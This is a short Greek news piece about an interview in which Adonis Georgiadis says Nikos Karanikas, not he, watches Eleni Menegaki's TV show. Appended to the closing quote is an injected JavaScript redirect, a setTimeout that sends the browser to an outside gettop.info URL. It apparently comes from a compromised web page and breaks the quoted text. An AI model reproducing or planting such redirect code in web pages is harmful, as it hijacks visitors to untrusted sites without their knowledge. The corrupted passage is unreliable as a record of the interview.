Άδωνις: Την Ελένη Μενεγάκη τη βλέπει ο κύριος Καρανίκας, όχι εγώ

0
10

Συνέντευξη στη νέα εκπομπή των Κατερίνας Καραβάτου και Κρατερού Κατσούλη στο Epsilon, «Έτοιμο το Πρωινό», παραχώρησε ο αντιπρόεδρος της ΝΔ Άδωνις Γεωργιάδης ο οποίος αναφέρθηκε στο τηλεοπτικό τοπίο αλλά και στην… αδυναμία του συμβουλου του πρωθυπουργού Νίκου Καρανίκα στην Ελένη Μενεγάκη.

Σχολιάζοντας τη δική του σχέση με την τηλεόραση, είπε: «Δεν βλέπω και πάρα πολύ τηλεόραση. Δεν προλαβαίνω να δω τηλεόραση. Πιο πολλές ώρες είμαι στην τηλεόραση, παρά βλέπω τηλεόραση».

Ενώ για την αγάπη του Νίκου Καρανίκα στην εκπομπή της Ελένης Μενεγάκη σχολίασε: «Την Ελένη Μενεγάκη την βλέπει ο κύριος Καρανίκας, εγώ δεν την παρακολουθώ. Δεν προλαβαίνω εκείνη την ώρα, για να μη φανεί ότι το λέω ειρωνικά για την Ελένη, η οποία είναι η καλύτερη επαγγελματίας στη δουλειά της χωρίς καμία αμφιβολία και δεν έχει να αποδείξει σε κανέναν τίποτα. Την ώρα που είναι αυτές οι εκπομπές εγώ δεν είμαι μπροστά στην τηλεόραση για να παρακολουθήσω. Αλλά αφού υπάρχει ο κύριος Καρανίκας και μας τα βάζει στο Twitter…Mπράβο του!». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here